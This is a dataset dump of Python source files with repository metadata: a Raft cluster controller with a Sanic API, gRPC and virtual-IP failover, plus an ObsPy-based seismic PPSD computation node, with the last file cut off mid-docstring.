self._name = name\n Animal.counter += 1\n Animal.animals[self._name] = Animal.counter\n else:\n self._name = name\n\n def __str__(self) -> str:\n \"\"\"Return 'counter. Name' as a string.\n\n Like '10006. Horse'\n \"\"\"\n return f\"{self.animals[self._name]}. 
{self._name.title()}\"\n\n    @classmethod\n    def zoo(cls):\n        \"\"\"Text list of all animals in zoo.\n\n        Every line is an animal's string representation\n        \"\"\"\n        menagerie = []\n        for animal in cls.animals:\n            menagerie.append(str(cls(animal)))\n        return \"\\n\".join(menagerie)\n", "repo_name": "jsh/pybites", "sub_path": "138/zoo.py", "file_name": "zoo.py", "file_ext": "py", "file_size_in_byte": 931, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "40626323766", "text": "# coding:utf-8\nimport asyncio\nimport json\nimport multiprocessing\nimport sys\nimport time\nimport traceback\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom cluster_master.utils import dc_vip\n\n\nfrom cluster_raft import raft_init, tools, raft_grpc_pb2\nimport grpc\n\nfrom cluster_raft import raft_grpc_pb2_grpc, raft_grpc_server\nfrom sanic import Sanic, request, response\n\nfrom cluster_raft.tools import vip_event, logger, stop_thread, spawn, up_cluster_event\n\nfrom conf import CONFIG\n\napp = Sanic(__name__)\n\nsys.path.append(\"../\")\n\n\n@app.route('/status', methods=[\"GET\"])\nasync def getStatus(request):\n res = raft_init.raft_obj.getStatus()\n return response.json(res)\n\n\n@app.route('/register/<host>')\nasync def h_register(request, host):\n raft_init.raft_obj.addNodeToClusterDC(host)\n result = raft_init.raft_obj.getStatus()\n return response.json(result)\n\n\n# Remove a node from the cluster\n@app.route('/unregister/<host>')\nasync def h_unregister(request, host):\n raft_init.raft_obj.removeNodeFromClusterDC(host)\n await asyncio.sleep(1)\n result = raft_init.raft_obj.getStatus()\n return response.json(result)\n\n\n# Trigger an election\n@app.route('/election')\nasync def h_election(request):\n # Release the VIP and re-run the election\n # common.vip_restart.set()\n raft_init.raft_obj.dc_election()\n return response.json({\n 'msg': 'handled election. 
'\n })\n\n\n@app.route('/node')\nasync def get_all_node(request):\n # Release the VIP and re-run the election\n # common.vip_restart.set()\n return response.json({\n 'node': raft_init.raft_obj.allNodeAddrs\n })\n\n\ndef vip_load():\n logger.info(vip_event.is_set())\n with grpc.insecure_channel(\"0.0.0.0:{}\".format(CONFIG.get(\"raft_grpc_port\"))) as chan:\n stub = raft_grpc_pb2_grpc.RaftServiceStub(channel=chan)\n\n # p = multiprocessing.Process(target=send_status_to_schedule, args=())\n # p.daemon = True\n from cluster_master.cluster import q1\n while True:\n time.sleep(3)\n ts = int(time.time())\n\n try:\n res_f = stub.GetStatus.future(\n raft_grpc_pb2.GetStatusReq(\n ts=str(ts)), timeout=3)\n if res_f.result().ts == str(ts):\n raft_status = json.loads(res_f.result().status)\n # raft_status = raft_init.raft_obj.getStatus()\n logger.info(\n \"vip_event {},leader {}, self_node {},isReady {}\".format(\n vip_event.is_set(),\n raft_status['leader'],\n raft_status['self'],\n raft_status[\"isReady\"]))\n\n if vip_event.is_set(\n ) and raft_status['leader'] == raft_status['self'] and raft_status[\"state\"] == 2:\n dc_vip.vip.set_vip(\"up\")\n vip_event.clear()\n up_cluster_event.set()\n q1.put(\"start\")\n # logger.info(\"starting >>> cluster_server\")\n # cs = ClusterServer(addr=\"0.0.0.0:8300\")\n # cs.start()\n # cli.append(cs)\n if not vip_event.is_set(\n ) and raft_status['leader'] != raft_status['self']:\n dc_vip.vip.set_vip(\"down\")\n vip_event.set()\n up_cluster_event.clear()\n q1.put(\"stop\")\n\n # cli.pop().stop()\n except Exception as e:\n logger.info(e)\n # logger.info(\"stopping >>> cluster_server\")\n # for i in cli:\n # i.stop()\n continue\n\n\ndef start_loop(loop):\n try:\n asyncio.set_event_loop(loop)\n loop.run_forever()\n except asyncio.CancelledError:\n loop.stop()\n\n except Exception as e:\n print(e)\n\n\nasync def raft_event_loop(raft_obj):\n alive_dict = {}\n alive_time = time.time()\n print(alive_time)\n with open(\"loop.log\", \"a\") as fw:\n fw.write(str(alive_time))\n while True:\n try:\n await asyncio.sleep(.2)\n # Check whether the loop may run; this step is reached once raft_init has started\n if tools.raft_loop.is_set():\n now = time.time()\n fw.write(str(raft_obj.isReady()))\n if raft_obj.isReady():\n status = raft_obj.getStatus()\n if status['state'] == 2:\n # Configure the network interface and set the vip_status event\n dc_vip.vip.set_vip('up')\n tools.vip_event.set()\n else:\n # Release the network interface (take the VIP down)\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n an = tools.get_all_nodes_from_raft_status(status)\n # Record each node's state in a loop; drop states that no longer exist\n for n in an:\n if n == status['self']:\n alive_dict[n] = now\n else:\n k = 'partner_node_status_server_' + n\n if status[k] == 2:\n alive_dict[n] = now\n else:\n if n not in alive_dict:\n alive_dict[n] = now\n elif now - alive_dict[n] > max(\n 2 * len(an),\n 3000\n ):\n raft_obj.removeNodeFromCluster(n)\n del alive_dict[n]\n else:\n pass\n for n in list(alive_dict.keys()):\n if n not in an.keys():\n del alive_dict[n]\n print('\\n{}-{} {} \\n{}'.format(status.get('leader'),\n status.get('raft_term'), len(an), an))\n if status['leader']:\n alive_time = time.time()\n else:\n alive_dict.clear()\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n if time.time() - alive_time > 3000:\n raft_obj.dc_election()\n alive_time = time.time()\n except Exception as e:\n print('{}\\n{}'.format(e, traceback.format_exc()))\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n\n\ndef run_server():\n p = spawn(target=vip_load, name=\"find_vip\")\n try:\n server = grpc.server(ThreadPoolExecutor(40))\n # Register the service handler with the rpc server\n raft_grpc_pb2_grpc.add_RaftServiceServicer_to_server(\n 
raft_grpc_server.RaftService(), server)\n # This uses the insecure port; gRPC also supports TLS/SSL connections and various auth mechanisms\n server.add_insecure_port(\n \"0.0.0.0:{}\".format(\n CONFIG.get(\"raft_grpc_port\")))\n server.start()\n # Start the service\n # TODO running the election in a separate process raises an error\n app.run(\n host='0.0.0.0',\n # port 8586; only started on the master\n port=CONFIG.get(\"raft_http_port\"),\n )\n except Exception as e:\n logger.info(e)\n\n finally:\n stop_thread(p)\n dc_vip.vip.set_vip(\"down\")\n exit(\"exiting\")\n\n\nif __name__ == '__main__':\n run_server()\n", "repo_name": "alan-mi/8.16", "sub_path": "cluster_raft/raft_main.py", "file_name": "raft_main.py", "file_ext": "py", "file_size_in_byte": 7873, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sanic.Sanic", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 30, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 30, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 31, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 31, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.addNodeToClusterDC", "line_number": 36, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 36, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 37, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 37, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 38, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 38, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.removeNodeFromClusterDC", "line_number": 44, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 44, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 46, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 46, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 47, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 47, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.dc_election", "line_number": 55, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 55, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 56, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 56, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 65, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 65, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 66, "usage_type": 
"attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 66, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 71, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 71, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 71, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 71, "usage_type": "name"}, {"api_name": "grpc.insecure_channel", "line_number": 72, "usage_type": "call"}, {"api_name": "conf.CONFIG.get", "line_number": 72, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 72, "usage_type": "name"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc.RaftServiceStub", "line_number": 73, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2.GetStatusReq", "line_number": 84, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2", "line_number": 84, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 91, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 91, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 96, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 96, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 98, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 98, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 99, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 99, "usage_type": "name"}, {"api_name": "cluster_raft.tools.up_cluster_event.set", "line_number": 100, "usage_type": "call"}, {"api_name": "cluster_raft.tools.up_cluster_event", "line_number": 100, "usage_type": "name"}, {"api_name": "cluster_master.cluster.q1.put", "line_number": 101, "usage_type": "call"}, {"api_name": "cluster_master.cluster.q1", "line_number": 101, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 106, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 106, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 108, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 108, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 108, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.set", "line_number": 109, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 109, "usage_type": "name"}, {"api_name": "cluster_raft.tools.up_cluster_event.clear", "line_number": 110, "usage_type": "call"}, {"api_name": "cluster_raft.tools.up_cluster_event", "line_number": 110, "usage_type": "name"}, {"api_name": "cluster_master.cluster.q1.put", "line_number": 111, "usage_type": "call"}, 
{"api_name": "cluster_master.cluster.q1", "line_number": 111, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 115, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 115, "usage_type": "name"}, {"api_name": "asyncio.set_event_loop", "line_number": 124, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 126, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 135, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "cluster_raft.tools.raft_loop.is_set", "line_number": 143, "usage_type": "call"}, {"api_name": "cluster_raft.tools.raft_loop", "line_number": 143, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 143, "usage_type": "name"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 150, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 150, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.set", "line_number": 151, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 151, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 154, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 154, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 155, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 155, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 155, "usage_type": "name"}, {"api_name": "cluster_raft.tools.get_all_nodes_from_raft_status", "line_number": 156, "usage_type": "call"}, {"api_name": "cluster_raft.tools", "line_number": 156, "usage_type": "name"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 185, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 185, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 185, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 186, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 186, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 186, "usage_type": "name"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}, {"api_name": "time.time", "line_number": 189, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 191, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 192, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 192, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 192, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 193, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 193, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 193, 
"usage_type": "name"}, {"api_name": "cluster_raft.tools.spawn", "line_number": 197, "usage_type": "call"}, {"api_name": "grpc.server", "line_number": 199, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 199, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc.add_RaftServiceServicer_to_server", "line_number": 201, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc", "line_number": 201, "usage_type": "name"}, {"api_name": "cluster_raft.raft_grpc_server.RaftService", "line_number": 202, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_server", "line_number": 202, "usage_type": "name"}, {"api_name": "conf.CONFIG.get", "line_number": 206, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 206, "usage_type": "name"}, {"api_name": "conf.CONFIG.get", "line_number": 213, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 213, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 216, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 216, "usage_type": "name"}, {"api_name": "cluster_raft.tools.stop_thread", "line_number": 219, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 220, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "73627167234", "text": "import copy\nimport os\nimport warnings\n\nimport psysmon\nimport psysmon.core.packageNodes\nimport psysmon.core.preferences_manager as psy_pm\nimport psysmon.gui.dialog.pref_listbook as psy_lb\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport obspy.core\n\nplt.style.use(psysmon.plot_style)\n\n\nclass ComputePpsdNode(psysmon.core.packageNodes.LooperCollectionChildNode):\n '''\n '''\n name = 'compute PPSD'\n mode = 'looper child'\n category = 'Frequency analysis'\n tags = ['stable', 'probability power spectral density']\n\n def __init__(self, **args):\n psysmon.core.packageNodes.LooperCollectionChildNode.__init__(self, **args)\n\n self.create_parameters_prefs()\n self.create_output_prefs()\n\n # The PPSD object.\n self.ppsd = None\n\n # The start and end times of the overall timespan used for the chunk\n # execution.\n self.overall_start_time = None\n self.overall_end_time = None\n\n\n @property\n def post_stream_length(self):\n ''' The time-span needed for correct processing prior to the start time\n of the stream passed to the execute method [s].\n '''\n ppsd_length = self.pref_manager.get_value('ppsd_length')\n overlap = self.pref_manager.get_value('ppsd_overlap')\n return ppsd_length * (overlap / 100.)\n\n\n def create_parameters_prefs(self):\n ''' Create the preference items of the parameters section.\n '''\n par_page = self.pref_manager.add_page('parameters')\n ppsd_group = par_page.add_group('ppsd')\n\n pref_item = psy_pm.FloatSpinPrefItem(name = 'ppsd_length',\n label = 'ppsd length [s]',\n value = 3600,\n limit = [0, 1e10],\n increment = 1,\n digits = 3,\n tool_tip = 'Length of data segments passed to psd [s].')\n ppsd_group.add_item(pref_item)\n\n pref_item = psy_pm.IntegerSpinPrefItem(name = 'ppsd_overlap',\n label = 'ppsd overlap [%]',\n value = 50,\n limit = [0, 99],\n tool_tip = 'Overlap of segments passed to psd [%].')\n ppsd_group.add_item(pref_item)\n\n\n def create_output_prefs(self):\n ''' Create the output 
preference items.\n '''\n out_page = self.pref_manager.add_page('output')\n img_group = out_page.add_group('image')\n\n item = psy_pm.FloatSpinPrefItem(name = 'img_width',\n label = 'width [cm]',\n value = 16.,\n increment = 1,\n digits = 1,\n limit = [1, 1000],\n tool_tip = 'The width of the PPSD image in cm.')\n img_group.add_item(item)\n\n item = psy_pm.FloatSpinPrefItem(name = 'img_height',\n label = 'height [cm]',\n value = 12.,\n increment = 1,\n digits = 1,\n limit = [1, 1000],\n tool_tip = 'The height of the PPSD image in cm.')\n img_group.add_item(item)\n\n item = psy_pm.IntegerSpinPrefItem(name = 'img_resolution',\n label = 'resolution [dpi]',\n value = 300.,\n limit = [1, 10000],\n tool_tip = 'The resolution of the PPSD image in dpi.')\n img_group.add_item(item)\n\n def edit(self):\n ''' Show the node edit dialog.\n '''\n dlg = psy_lb. ListbookPrefDialog(preferences = self.pref_manager)\n dlg.ShowModal()\n dlg.Destroy()\n \n\n def make_output_dir(self, base_dir):\n ''' Build the output directory.\n '''\n output_dir = os.path.join(base_dir, 'ppsd')\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n return output_dir\n\n\n def execute(self, stream, process_limits = None, origin_resource = None, **kwargs):\n '''\n '''\n start_time = process_limits[0]\n end_time = process_limits[1]\n output_dir = self.make_output_dir(base_dir = kwargs['output_dir'])\n\n self.logger.info('Processing time interval: %s to %s.', start_time.isoformat(),\n end_time.isoformat())\n\n for cur_trace in stream:\n self.logger.info('Processing trace with id %s.', cur_trace.id)\n\n self.overall_start_time = start_time\n self.overall_end_time = end_time\n\n self.initialize_ppsd(cur_trace, start_time, end_time)\n\n self.logger.info(\"Adding the trace to the ppsd.\")\n try:\n self.ppsd.add(cur_trace)\n except Exception:\n self.logger.exception(\"Error when adding the trace %s.\", cur_trace)\n self.logger.info(\"Time limits of PPSD used times: %s to %s.\", self.ppsd.current_times_used[0].isoformat(),\n self.ppsd.current_times_used[-1].isoformat())\n\n self.save_ppsd(output_dir = output_dir)\n\n\n def execute_chunked(self, chunk_count, total_chunks, stream,\n process_limits = None, origin_resource = None, **kwargs):\n '''\n '''\n start_time = process_limits[0]\n end_time = process_limits[1]\n output_dir = self.make_output_dir(base_dir = kwargs['output_dir'])\n\n self.logger.info('Processing chunk %d/%d with time interval: %s to %s.', chunk_count, total_chunks,\n start_time.isoformat(),\n end_time.isoformat())\n for cur_trace in stream:\n self.logger.info('Processing trace with id %s.', cur_trace.id)\n\n if self.ppsd is None:\n # Initialize the PPSD.\n self.initialize_ppsd(cur_trace, start_time, end_time)\n self.overall_start_time = start_time\n if chunk_count == total_chunks:\n # Don't use the data past the intended end time.\n cur_trace = cur_trace.trim(starttime = start_time,\n endtime = end_time)\n self.overall_end_time = end_time\n\n self.logger.info(\"Adding the trace to the ppsd.\")\n try:\n self.ppsd.add(cur_trace)\n self.logger.info(\"Time limits of PPSD used times: %s to %s.\", self.ppsd.current_times_used[0].isoformat(),\n self.ppsd.current_times_used[-1].isoformat())\n except Exception:\n self.logger.warning(\"No PPSD data accumulated.\")\n\n if chunk_count == total_chunks:\n self.overall_end_time = end_time\n self.save_ppsd(output_dir = output_dir)\n\n\n\n def initialize_ppsd(self, trace, start_time, end_time):\n ''' Initialize the PPSD.\n '''\n super(ComputePpsdNode, self).initialize()\n\n 
ppsd_length = self.pref_manager.get_value('ppsd_length')\n ppsd_overlap = self.pref_manager.get_value('ppsd_overlap') / 100.\n\n # Get the channel instance from the inventory.\n cur_channel = self.project.geometry_inventory.get_channel(station = trace.stats.station,\n name = trace.stats.channel,\n network = trace.stats.network,\n location = trace.stats.location)\n\n if len(cur_channel) == 0:\n self.logger.error(\"No channel found for trace %s. Can't initialize the PPSD object.\", trace.id)\n raise RuntimeError(\"No channel found for trace %s. Can't initialize the PPSD object.\" % trace.id)\n elif len(cur_channel) > 1:\n self.logger.error(\"Multiple channels found for trace %s; channels: %s\", trace.id, cur_channel)\n raise RuntimeError(\"Multiple channels found for trace %s; channels: %s. Can't initialize the PPSD object.\" % (trace.id, cur_channel))\n else:\n cur_channel = cur_channel[0]\n\n # Get the recorder and sensor parameters.\n rec_stream_tb = cur_channel.get_stream(start_time = start_time,\n end_time = end_time)\n\n rec_stream_param = []\n comp_param = []\n for cur_rec_stream_tb in rec_stream_tb:\n cur_rec_stream = cur_rec_stream_tb.item\n cur_rec_stream_param = cur_rec_stream.get_parameter(start_time = start_time,\n end_time = end_time)\n rec_stream_param.extend(cur_rec_stream_param)\n\n comp_tb = cur_rec_stream.get_component(start_time = start_time,\n end_time = end_time)\n for cur_comp_tb in comp_tb:\n cur_comp = cur_comp_tb.item\n cur_comp_param = cur_comp.get_parameter(start_time = start_time,\n end_time = end_time)\n comp_param.extend(cur_comp_param)\n\n if len(rec_stream_param) > 1 or len(comp_param) > 1:\n raise ValueError('There are more than one parameters for this component. This is not yet supported.')\n else:\n rec_stream_param = rec_stream_param[0]\n comp_param = comp_param[0]\n\n # Create the obspy PAZ dictionary.\n paz = {}\n paz['gain'] = comp_param.tf_normalization_factor\n #paz['sensitivity'] = old_div((rec_stream_param.gain * comp_param.sensitivity), rec_stream_param.bitweight)\n paz['sensitivity'] = 1\n paz['poles'] = comp_param.tf_poles\n paz['zeros'] = comp_param.tf_zeros\n\n # Create the ppsd instance and add the stream.\n stats = trace.stats\n\n # Monkey patch the PPSD plot method.\n obspy.signal.PPSD.plot = ppsd_plot\n\n # TODO: Make the db_bins argument user-selectable. 
\n # db_bins = (-200, -20, 1.)\n self.ppsd = obspy.signal.PPSD(stats,\n metadata = paz,\n ppsd_length = ppsd_length,\n overlap = ppsd_overlap)\n\n\n def save_ppsd(self, output_dir):\n '''\n '''\n ppsd_id = self.ppsd.id.replace('.', '_')\n start_string = self.overall_start_time.isoformat().replace(':', '')\n end_string = self.overall_end_time.isoformat().replace(':', '')\n\n # Add the station name and channel to the output directory.\n img_output_dir = os.path.join(output_dir,\n 'images',\n self.ppsd.station,\n self.ppsd.channel)\n if not os.path.exists(img_output_dir):\n os.makedirs(img_output_dir)\n\n data_output_dir = os.path.join(output_dir,\n 'ppsd_objects',\n self.ppsd.station,\n self.ppsd.channel)\n if not os.path.exists(data_output_dir):\n os.makedirs(data_output_dir)\n\n # Create the output filenames.\n filename = 'ppsd_%s_%s_%s.png' % (ppsd_id,\n start_string,\n end_string)\n image_filename = os.path.join(img_output_dir,\n filename)\n filename = 'ppsd_%s_%s_%s.pkl.npz' % (ppsd_id,\n end_string,\n end_string)\n npz_filename = os.path.join(data_output_dir,\n filename)\n\n # Set the viridis colomap 0 value to fully transparent white.\n cmap = plt.get_cmap('viridis')\n cmap = copy.copy(cmap)\n cmap.colors = np.array(cmap.colors)\n cmap.colors = np.hstack([cmap.colors, np.ones(cmap.N)[:, np.newaxis]])\n cmap.colors[0] = np.array([1, 1, 1, 0])\n cmap.colors = list(cmap.colors)\n\n # TODO: make the period limit user selectable\n width = self.pref_manager.get_value('img_width') / 2.54\n height = self.pref_manager.get_value('img_height') / 2.54\n dpi = self.pref_manager.get_value('img_resolution')\n fig = plt.figure(figsize = (width, height), dpi = dpi)\n try:\n fig = self.ppsd.plot(period_lim = (1/1000., 10),\n xaxis_frequency = True,\n cmap = cmap,\n show = False,\n show_coverage = True,\n fig = fig)\n except Exception:\n self.logger.error(\"Couldn't create the PPSD figure. 
Maybe there was no data accumulated.\")\n\n try:\n self.logger.info(\"Saving image to file %s.\", image_filename)\n if not os.path.exists(os.path.dirname(image_filename)):\n os.makedirs(os.path.dirname(image_filename))\n fig.savefig(image_filename, dpi = dpi)\n except Exception:\n self.logger.error(\"Couldn't save the PPSD.\")\n\n try:\n self.logger.info(\"Saving ppsd object to %s.\", npz_filename)\n if not os.path.exists(os.path.dirname(npz_filename)):\n os.makedirs(os.path.dirname(npz_filename))\n self.ppsd.save_npz(npz_filename)\n except Exception:\n self.logger.error(\"Couldn't save the PPSD data file.\")\n\n # Delete the figure.\n fig.clear()\n plt.close(fig)\n del fig\n\n # Clear the ppsd object.\n self.ppsd = None\n\n # Reset the chunked window limits.\n self.overall_start_time = None\n self.overall_end_time = None\n\n\n\n# A monkey patch of the obspy.signal.PPSD.plot method to deal with the problems\n# of resizing the figure.\ndef ppsd_plot(self, fig = None, filename=None, show_coverage=True, show_histogram=True,\n show_percentiles=False, percentiles=[0, 25, 50, 75, 100],\n show_noise_models=True, grid=True, show=True,\n max_percentage=None, period_lim=(0.01, 179), show_mode=False,\n show_mean=False, cmap=obspy.imaging.cm.obspy_sequential, cumulative=False,\n cumulative_number_of_colors=20, xaxis_frequency=False):\n \"\"\"\n Plot the 2D histogram of the current PPSD.\n If a filename is specified the plot is saved to this file, otherwise\n a plot window is shown.\n\n :type filename: str, optional\n :param filename: Name of output file\n :type show_coverage: bool, optional\n :param show_coverage: Enable/disable second axes with representation of\n data coverage time intervals.\n :type show_percentiles: bool, optional\n :param show_percentiles: Enable/disable plotting of approximated\n percentiles. These are calculated from the binned histogram and\n are not the exact percentiles.\n :type show_histogram: bool, optional\n :param show_histogram: Enable/disable plotting of histogram. This\n can be set ``False`` e.g. to make a plot with only percentiles\n plotted. Defaults to ``True``.\n :type percentiles: list of ints\n :param percentiles: percentiles to show if plotting of percentiles is\n selected.\n :type show_noise_models: bool, optional\n :param show_noise_models: Enable/disable plotting of noise models.\n :type grid: bool, optional\n :param grid: Enable/disable grid in histogram plot.\n :type show: bool, optional\n :param show: Enable/disable immediately showing the plot.\n :type max_percentage: float, optional\n :param max_percentage: Maximum percentage to adjust the colormap. The\n default is 30% unless ``cumulative=True``, in which case this value\n is ignored.\n :type period_lim: tuple of 2 floats, optional\n :param period_lim: Period limits to show in histogram. When setting\n ``xaxis_frequency=True``, this is expected to be frequency range in\n Hz.\n :type show_mode: bool, optional\n :param show_mode: Enable/disable plotting of mode psd values.\n :type show_mean: bool, optional\n :param show_mean: Enable/disable plotting of mean psd values.\n :type cmap: :class:`matplotlib.colors.Colormap`\n :param cmap: Colormap to use for the plot. To use the color map like in\n PQLX, [McNamara2004]_ use :const:`obspy.imaging.cm.pqlx`.\n :type cumulative: bool\n :param cumulative: Can be set to `True` to show a cumulative\n representation of the histogram, i.e. 
